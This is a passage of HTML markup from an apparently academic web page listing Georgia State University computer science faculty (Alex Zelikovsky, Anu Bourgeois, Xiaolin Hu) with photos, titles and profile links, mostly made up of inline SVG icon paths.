</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-zelikovsky-e1697143252884-1.jpeg\" class=\"wp-image-1673 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-bourgeois-e1697143389924.jpeg\" class=\"wp-image-1675 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/cropped-cropped-hu_new-1-e1697143455517.jpg\" class=\"wp-image-1677 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 